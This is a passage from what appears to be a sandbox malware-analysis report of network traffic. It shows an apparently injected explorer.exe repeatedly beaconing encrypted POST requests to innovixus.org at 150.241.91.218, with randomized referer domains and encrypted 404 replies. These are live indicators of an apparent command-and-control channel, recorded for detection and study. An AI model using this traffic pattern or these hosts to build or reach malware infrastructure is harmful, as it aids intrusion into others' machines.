                                                                                                                                                              Nov 6, 2024 17:36:02.930721998 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:03.188267946 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:03 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              92192.168.11.2049846150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:03.395441055 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://icjmujgckskw.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:03.395441055 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:03.654650927 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:03 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              93192.168.11.2049847150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:03.856085062 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://kljggysxqgiupom.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:03.856086016 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:04.113998890 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:04 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              94192.168.11.2049848150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:04.315670013 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://rahadrfuwibe.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:04.315670013 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:04.572537899 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:04 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              95192.168.11.2049849150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:04.772078037 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://yagxuikmfijdqdvi.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:04.772078037 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:05.029994011 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:04 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              96192.168.11.2049850150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:05.229794025 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://svuowwnqaiovsto.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:05.229794025 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:06.495898008 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:06 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              97192.168.11.2049851150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:06.695849895 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://gpccsgwkguivrv.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:06.695849895 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:06.956846952 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:06 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              98192.168.11.2049852150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:07.160839081 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://opsfroswvvvu.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:07.160839081 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:07.419302940 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:07 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              99192.168.11.2049853150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:07.620390892 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://svrsrgqugslwsxx.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:07.620390892 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:07.878751040 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:07 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              100192.168.11.2049854150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:08.080626011 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://pfmkntqknncyu.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:08.080626965 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:08.388736963 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:08 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              101192.168.11.2049855150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:08.589750051 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://yghnvmspuumn.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:08.589750051 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:08.844120979 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:08 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              102192.168.11.2049856150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:09.046145916 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ftooglukesursjk.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:09.046145916 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:09.303946018 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:09 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              103192.168.11.2049857150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:09.509927988 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://agfqasgtejtmdrb.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:09.509927988 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:09.769226074 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:09 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              104192.168.11.2049858150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:09.969947100 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://kbfwckjwbni.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:09.969948053 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:10.228612900 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:10 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              105192.168.11.2049859150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:10.429702997 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://jyesjcmnxjpn.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:10.429702997 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:10.683495998 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:10 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
